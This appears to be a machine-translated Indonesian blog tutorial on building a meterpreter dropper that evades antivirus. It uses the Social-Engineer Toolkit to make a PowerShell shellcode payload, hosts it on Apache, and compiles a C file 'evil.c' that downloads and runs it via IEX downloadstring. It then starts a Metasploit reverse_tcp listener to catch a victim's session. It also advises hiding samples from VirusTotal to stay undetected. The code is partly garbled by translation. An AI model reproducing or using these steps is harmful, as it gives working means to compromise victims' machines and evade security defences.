Cara Bypass Antivirus Menggunakan Powershell Dan Metasploit

Anda ingin membuat virus meterpreter, tetapi Anda tetap tertangkap oleh AV. Bagaimana Anda membuat satu yang akan terdeteksi? Dalam tutorial ini, akan dijelaskan bagaimana kode virus sederhana Anda sendiri yang akan men-download payload PowerShell dari webserver apache dan jalan melewati antivirus.

Sekarang yang Anda butuhkan adalah,,,

1. Kali Linux

2. A 'C' Compiler (saya biasa menggunakan gcc pada Windows)

3. The Social Teknik Toolkit (terinstal pada kali)

4. Sebuah Webserver Apache (terinstal pada kali)

5. The Metasploit Framework (juga terinstal pada kali)

Langkah 1: Membuat Payload Powershell

Kami akan menggunakan Teknik Toolkit Sosial untuk membuat payload PowerShell kami. Untuk membukanya, ketik ini di konsol:

setoolkit

Dari sana, tipe 1 untuk "serangan rekayasa sosial", maka 9 untuk "vektor serangan PowerShell", dan akhirnya 1 untuk "PowerShell alfanumerik shellcode injektor". Sekarang, Anda harus memberikan "LHOST". Jika Anda tidak sudah tahu, ini adalah alamat IP lokal mesin penyerang Anda (asalkan Anda menyerang melalui jaringan area lokal). Untuk menentukan itu, membuka jendela terminal baru dan ketik:

ifconfig

Gulir ke atas untuk menemukan antarmuka yang terhubung ke jaringan Anda (dalam kasus saya, itu "eth0"). Cari apa yang saya disorot, "inet", dan di samping itu Anda akan menemukan alamat IP lokal Anda (dalam kasus saya, itu 10.0.0.13). Ini adalah apa yang akan Anda masukan untuk LHOST Anda.

Berikutnya, itu akan meminta Anda untuk mengetik dalam "port untuk sebaliknya". Ini mengacu pada "LPORT". Biasanya, saya menggunakan "4444" seperti itu konvensi meterpreter, tetapi Anda dapat menggunakan port yang Anda inginkan selama Anda ingat.

Maka ia akan meminta Anda jika Anda ingin "memulai pendengar sekarang". Ketik "tidak", kami akan melakukannya secara manual nanti. Untuk saat ini kita sudah selesai dengan SET.

Sekarang kita akan perlu untuk memindahkan muatan yang ke webserver apache kami. Untuk melakukannya, buka terminal dan ketik:

mv /root/.set/reports/powershell/x86_powershell_ injection.txt /var/www/html/payload.txt Namun, jika Anda masih menggunakan Kali Linux 1 (tidak 2), menggunakan perintah ini:

mv /root/.set/reports/powershell/x86_powershell_ injection.txt /var/www/payload.txt

Hal ini karena, di Kali Linux versi 2, direktori root apache dipindahkan ke "html" folder dalam / var / www /.

Sekarang, cukup ketik:

layanan apache2 start ... dan webserver Anda harus mulai.

Langkah 2: Membuat Virus Untuk membuat virus, saya menggunakan jendela notepad dan MinGW ini "gcc". Kode untuk virus adalah sebagai berikut:

#include utama() { sistem ("powershell.exe \" IEX ((baru-objek net.webclient) .downloadstring ('http://10.0.0.13/ payload.txt')) \ ""); return 0; }

Ingatlah untuk mengubah "10.0.0.13", sebagai LHOST Anda (atau alamat IP lokal) kemungkinan akan berbeda.

Simpan ini sebagai "evil.c", kemudian compile menggunakan compiler c favorit Anda. Dalam kasus saya, saya menggunakan gcc jadi saya ketik:

gcc.exe D: \ Hacking \ evil.c -o D: \ Hacking \ evil.exe

Sekarang kita memiliki kita FUD ("sepenuhnya tidak terdeteksi") dieksekusi.

Langkah 3: Menyiapkan Pendengar Terakhir, kita perlu mengatur pendengar untuk menunggu untuk sesi meterpreter. Jalankan kerangka metasploit dengan mengetik:

msfconsole

Setelah itu beban, ketik: menggunakan multi / handler

Sekarang, Anda harus mengetikkan serangkaian pilihan jadi saya akan daftar mereka untuk Anda:

Jendela set payload / meterpreter / reverse_tcp

mengatur LHOST

10.0.0.13

mengatur LPORT 4444

Sekali lagi, ingat untuk mengubah LHOST ke alamat IP lokal Anda, dan mengubah LPORT jika Anda menggunakan sesuatu selain 4444.

Akhirnya, ketik "mengeksploitasi" dan tekan enter untuk memulai pendengar. Begitu korban Anda menjalankan "evil.exe" virus, Anda akan mendapatkan sesi.

Jika Anda ingin memeriksa executable Anda terhadap antivirus, saya sarankan untuk tidak menggunakan VirusTotal. Hal ini karena mereka mengirimkan tanda tangan mereka ke perusahaan antivirus - meningkatkan kemungkinan dieksekusi Anda terdeteksi. Sebaliknya, secara pribadi saya menggunakan nodistribute.com karena, jika mereka menjaga untuk kata-kata mereka, tanda tangan tidak sedang diajukan. Berikut adalah hasil eksekusi saya jika Anda tertarik:

Saya harap Anda menemukan posting saya berguna dan mudah diikuti. Karena ini adalah posting pertama saya di sini (atau di mana saja, dalam hal ini), saya akan sangat menghargai umpan balik tentang apa yang bisa saya lakukan lebih baik. Anyways, terima kasih untuk membaca posting saya, dan semoga berhasil!